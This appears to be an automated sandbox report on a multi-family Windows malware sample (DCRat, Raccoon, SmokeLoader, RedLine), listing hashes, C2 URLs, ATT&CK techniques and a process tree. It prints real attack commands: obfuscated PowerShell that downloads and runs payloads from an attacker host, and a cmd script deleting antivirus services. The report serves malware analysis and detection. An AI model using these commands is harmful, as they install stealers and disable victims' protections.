dcrat | aaa3cda8d3f4bc7ff94a3e4f0fd37aced9d484b663bc15f198e6e25482f60443

Analysis

max time kernel
129s
max time network
163s
platform
windows10_x64
resource
win10v20210408
submitted
12-08-2021 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

89c3336ea6ed1ad75668c067912e7305.exe
Size

319KB
MD5

89c3336ea6ed1ad75668c067912e7305
SHA1

2de13b667bbca2e1f0f4477007a644c09a86e533
SHA256

aaa3cda8d3f4bc7ff94a3e4f0fd37aced9d484b663bc15f198e6e25482f60443
SHA512

10226b86087eeb0d2b878fcec69b5fae7dc28ba16260cf5bc31cfb6af1f2c2ddcbcadca3c9fea5a4fcdbf983e00a734c746e0ae9a1b3ea424c1bd921198faa28

Score

10^/10

dcrat raccoon redline smokeloader 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence phishing rat spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.rockonwest.best/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Detected phishing page
phishing
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	2628	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3292	2628	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4052	2628	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2248	2628	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	2628	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3880	2628	schtasks.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2172-169-0x0000000000BF0000-0x0000000000C81000-memory.dmp	family_raccoon
behavioral2/memory/2172-170-0x0000000000400000-0x0000000000946000-memory.dmp	family_raccoon
behavioral2/memory/4708-282-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/4708-283-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/4708-285-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata

DCRat Payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\E556.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\E556.exe	dcrat
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe	dcrat
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe	dcrat
C:\Windows\System32\msaudite\dwm.exe	dcrat
C:\Windows\System32\msaudite\dwm.exe	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1004 4484 powershell.exe
Downloads MZ/PE file

flow	pid	process
1004	4484	powershell.exe

Executes dropped EXE 12 IoCs

Processes:

E38F.exeE556.exeE864.exeEAC6.exeRuntimebroker.exeF97D.exeFE6F.exereviewbrokercrtCommonsessionperfDll.exeRuntimebroker_new.exeRuntimebroker.exedwm.exeEAC6.exe

pid	process
192	E38F.exe
2952	E556.exe
1104	E864.exe
3640	EAC6.exe
2072	Runtimebroker.exe
1128	F97D.exe
2172	FE6F.exe
4060	reviewbrokercrtCommonsessionperfDll.exe
2324	Runtimebroker_new.exe
3028	Runtimebroker.exe
4280	dwm.exe
4708	EAC6.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

F97D.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	F97D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	F97D.exe

Deletes itself 1 IoCs

Processes:

pid process

3016

pid	process
3016

Drops startup file 3 IoCs

Processes:

cmd.exeRuntimebroker.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Loads dropped DLL 6 IoCs

Processes:

FE6F.exeEAC6.exe

pid process

2172 FE6F.exe
2172 FE6F.exe
2172 FE6F.exe
2172 FE6F.exe
2172 FE6F.exe
4708 EAC6.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2172	FE6F.exe
2172	FE6F.exe
2172	FE6F.exe
2172	FE6F.exe
2172	FE6F.exe
4708	EAC6.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\F97D.exe	themida
C:\Users\Admin\AppData\Local\Temp\F97D.exe	themida
behavioral2/memory/1128-154-0x0000000000F50000-0x0000000000F51000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reviewbrokercrtCommonsessionperfDll.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Windows\\System32\\MPG4DECD\\sihost.exe\""	reviewbrokercrtCommonsessionperfDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\msaudite\\dwm.exe\""	reviewbrokercrtCommonsessionperfDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Boot\\et-EE\\OfficeClickToRun.exe\""	reviewbrokercrtCommonsessionperfDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewbrokercrtCommonsessionperfDll = "\"C:\\reviewbrokercrtCommon\\kB5VrhbV\\reviewbrokercrtCommonsessionperfDll.exe\""	reviewbrokercrtCommonsessionperfDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('https://www.rockonwest.best/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Documents and Settings\\sppsvc.exe\""	reviewbrokercrtCommonsessionperfDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\AppxBlockMap\\ShellExperienceHost.exe\""	reviewbrokercrtCommonsessionperfDll.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

F97D.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F97D.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	F97D.exe

Drops file in System32 directory 4 IoCs

Processes:

reviewbrokercrtCommonsessionperfDll.exe

description	ioc	process
File created	C:\Windows\System32\msaudite\6cb0b6c459d5d3455a3da700e713f2e2529862ff	reviewbrokercrtCommonsessionperfDll.exe
File created	C:\Windows\System32\MPG4DECD\sihost.exe	reviewbrokercrtCommonsessionperfDll.exe
File created	C:\Windows\System32\MPG4DECD\66fc9ff0ee96c2b21f0cfded48750ae9e3032bf3	reviewbrokercrtCommonsessionperfDll.exe
File created	C:\Windows\System32\msaudite\dwm.exe	reviewbrokercrtCommonsessionperfDll.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

F97D.exe

pid process

1128 F97D.exe

pid	process
1128	F97D.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

89c3336ea6ed1ad75668c067912e7305.exeEAC6.exe

description	pid	process	target process
PID 3260 set thread context of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3640 set thread context of 4708	3640	EAC6.exe	EAC6.exe

Drops file in Windows directory 2 IoCs

Processes:

reviewbrokercrtCommonsessionperfDll.exe

description	ioc	process
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe	reviewbrokercrtCommonsessionperfDll.exe
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\f8c8f1285d826bc63910aaf97db97186ba642b4f	reviewbrokercrtCommonsessionperfDll.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5108 4708 WerFault.exe EAC6.exe

pid	pid_target	process	target process
5108	4708	WerFault.exe	EAC6.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

89c3336ea6ed1ad75668c067912e7305.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	89c3336ea6ed1ad75668c067912e7305.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	89c3336ea6ed1ad75668c067912e7305.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	89c3336ea6ed1ad75668c067912e7305.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1492 schtasks.exe
3292 schtasks.exe
4052 schtasks.exe
2248 schtasks.exe
2224 schtasks.exe
3880 schtasks.exe

pid	process
1492	schtasks.exe
3292	schtasks.exe
4052	schtasks.exe
2248	schtasks.exe
2224	schtasks.exe
3880	schtasks.exe

Modifies registry class 2 IoCs

Processes:

E556.exereviewbrokercrtCommonsessionperfDll.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	E556.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	reviewbrokercrtCommonsessionperfDll.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

89c3336ea6ed1ad75668c067912e7305.exe

pid	process
2160	89c3336ea6ed1ad75668c067912e7305.exe
2160	89c3336ea6ed1ad75668c067912e7305.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3016
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

89c3336ea6ed1ad75668c067912e7305.exe

pid process

2160 89c3336ea6ed1ad75668c067912e7305.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

pid	process
3016

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

reviewbrokercrtCommonsessionperfDll.exeF97D.exepowershell.exedwm.exepowershell.exeEAC6.exepowershell.exeWerFault.exe

description	pid	process
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	4060	reviewbrokercrtCommonsessionperfDll.exe
Token: SeDebugPrivilege	1128	F97D.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	4280	dwm.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	3640	EAC6.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeRestorePrivilege	5108	WerFault.exe
Token: SeBackupPrivilege	5108	WerFault.exe
Token: SeDebugPrivilege	5108	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3016

pid	process
3016

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

89c3336ea6ed1ad75668c067912e7305.exeE556.exeE38F.exeWScript.execmd.exeE864.exeRuntimebroker.exeRuntimebroker_new.exe

description	pid	process	target process
PID 3260 wrote to memory of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3260 wrote to memory of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3260 wrote to memory of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3260 wrote to memory of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3260 wrote to memory of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3260 wrote to memory of 2160	3260	89c3336ea6ed1ad75668c067912e7305.exe	89c3336ea6ed1ad75668c067912e7305.exe
PID 3016 wrote to memory of 192	3016		E38F.exe
PID 3016 wrote to memory of 192	3016		E38F.exe
PID 3016 wrote to memory of 192	3016		E38F.exe
PID 3016 wrote to memory of 2952	3016		E556.exe
PID 3016 wrote to memory of 2952	3016		E556.exe
PID 3016 wrote to memory of 2952	3016		E556.exe
PID 3016 wrote to memory of 1104	3016		E864.exe
PID 3016 wrote to memory of 1104	3016		E864.exe
PID 3016 wrote to memory of 1104	3016		E864.exe
PID 3016 wrote to memory of 3640	3016		EAC6.exe
PID 3016 wrote to memory of 3640	3016		EAC6.exe
PID 3016 wrote to memory of 3640	3016		EAC6.exe
PID 2952 wrote to memory of 3880	2952	E556.exe	WScript.exe
PID 2952 wrote to memory of 3880	2952	E556.exe	WScript.exe
PID 2952 wrote to memory of 3880	2952	E556.exe	WScript.exe
PID 192 wrote to memory of 2072	192	E38F.exe	Runtimebroker.exe
PID 192 wrote to memory of 2072	192	E38F.exe	Runtimebroker.exe
PID 192 wrote to memory of 2072	192	E38F.exe	Runtimebroker.exe
PID 3016 wrote to memory of 1128	3016		F97D.exe
PID 3016 wrote to memory of 1128	3016		F97D.exe
PID 3016 wrote to memory of 1128	3016		F97D.exe
PID 3016 wrote to memory of 2172	3016		FE6F.exe
PID 3016 wrote to memory of 2172	3016		FE6F.exe
PID 3016 wrote to memory of 2172	3016		FE6F.exe
PID 3016 wrote to memory of 1628	3016		explorer.exe
PID 3016 wrote to memory of 1628	3016		explorer.exe
PID 3016 wrote to memory of 1628	3016		explorer.exe
PID 3016 wrote to memory of 1628	3016		explorer.exe
PID 3880 wrote to memory of 2848	3880	WScript.exe	cmd.exe
PID 3880 wrote to memory of 2848	3880	WScript.exe	cmd.exe
PID 3880 wrote to memory of 2848	3880	WScript.exe	cmd.exe
PID 3016 wrote to memory of 188	3016		explorer.exe
PID 3016 wrote to memory of 188	3016		explorer.exe
PID 3016 wrote to memory of 188	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 2848 wrote to memory of 4060	2848	cmd.exe	reviewbrokercrtCommonsessionperfDll.exe
PID 2848 wrote to memory of 4060	2848	cmd.exe	reviewbrokercrtCommonsessionperfDll.exe
PID 1104 wrote to memory of 1540	1104	E864.exe	cmd.exe
PID 1104 wrote to memory of 1540	1104	E864.exe	cmd.exe
PID 1104 wrote to memory of 1540	1104	E864.exe	cmd.exe
PID 3016 wrote to memory of 1256	3016		explorer.exe
PID 3016 wrote to memory of 1256	3016		explorer.exe
PID 3016 wrote to memory of 1256	3016		explorer.exe
PID 3016 wrote to memory of 2220	3016		explorer.exe
PID 3016 wrote to memory of 2220	3016		explorer.exe
PID 3016 wrote to memory of 2220	3016		explorer.exe
PID 3016 wrote to memory of 2220	3016		explorer.exe
PID 2072 wrote to memory of 2324	2072	Runtimebroker.exe	Runtimebroker_new.exe
PID 2072 wrote to memory of 2324	2072	Runtimebroker.exe	Runtimebroker_new.exe
PID 2072 wrote to memory of 2324	2072	Runtimebroker.exe	Runtimebroker_new.exe
PID 3016 wrote to memory of 508	3016		explorer.exe
PID 3016 wrote to memory of 508	3016		explorer.exe
PID 3016 wrote to memory of 508	3016		explorer.exe
PID 2324 wrote to memory of 3028	2324	Runtimebroker_new.exe	Runtimebroker.exe
PID 2324 wrote to memory of 3028	2324	Runtimebroker_new.exe	Runtimebroker.exe

C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe
"C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3260

C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe
"C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2160

C:\Users\Admin\AppData\Local\Temp\E38F.exe
C:\Users\Admin\AppData\Local\Temp\E38F.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:192

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2072

C:\ProgramData\Runtimebroker_new.exe
"C:\ProgramData\Runtimebroker_new.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2324

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
4⤵
- Executes dropped EXE
- Drops startup file
PID:3028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''https://www.rockonwest.best/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
5⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('https://www.rockonwest.best/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add 